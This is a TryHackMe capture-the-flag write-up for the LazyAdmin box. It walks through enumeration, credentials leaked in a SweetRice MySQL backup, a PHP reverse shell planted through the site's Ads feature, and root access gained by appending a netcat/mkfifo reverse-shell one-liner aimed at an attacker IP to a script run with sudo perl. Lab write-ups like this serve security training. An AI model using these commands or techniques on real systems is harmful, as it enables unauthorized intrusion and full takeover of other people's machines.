LazyAdmin (THM)

TryHackMeLazyAdmin Write-Up

topics: Web application security, public exploits, PHP RCE through misconfigured website (OWASP), Linux Privilege Escalation

  1. Enumeration

  2. Local Privilege Escalation

  3. Root Privilege Escalation

tools: nmapAutomator, dirsearch, searchsploit, kali php reverse shell, perl, sudo

Enumeration

initial nmap scan ../.autonmap.sh $ip Full

We have two ports open, SSH and HTTP. There is a default Apache homepage so lets run a dirsearch scan

python3 dirsearch.py -u $ip -e php,html,txt

There is one unique directory on the website named content, navigating to it reveals a website running SweetRice. Checking with searchsploit reveals

There appears to be several methods in which we'll be able to achieve local access. At first I looked at the "Arbitrary File Upload" program but it requires credentials. The "Backup Disclosure" text file reveals a file location that houses site credentials

The site is hosted under the /content directory so we'll have to check /content/inc/mysql_backup

This .sql file contains credentials for the website, cracking the password reveals the credentials manager:Password123

Coming back to the python program with credentials does not execute properly and without an error message to troubleshoot. However, within the code is a mention of a login page /as

Local Privilege Escalation

While we're aware of a login page, I went back through the searchsploit options, focusing next on PHP RCE now that we have credentials.

This means that within the Ads section on the website dashboard, we'll be able to include PHP code that executes the system shell. I used the code from the default Kali php reverse shell and created a new Ad.

The instructions mention that the shell will be located at /sweetrice/inc/ads/hacked.php, for us /content/inc/ads/ww.php. Navigating to the location and listening for the shell provide local access to the box

Root Privilege Escalation

As always with Linux boxes, sudo -l

We do not have the password of the current user www-data so we'll be unable to execute the shell with perl using sudo perl -e 'exec "/bin/sh";'

Instead we also have sudo permissions with a Perl program in another home folder, lets check the contents

We have read/write permissions for this file, meaning we can edit it to include the attacking address. Add a new line with the attacking address and listen for the shell, it will attempt to connect to the first IP address and will take a minute to connect

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.18.145 5554 >/tmp/f' >> copy.sh

sudo /usr/bin/perl /home/itguy/backup.pl

Last updated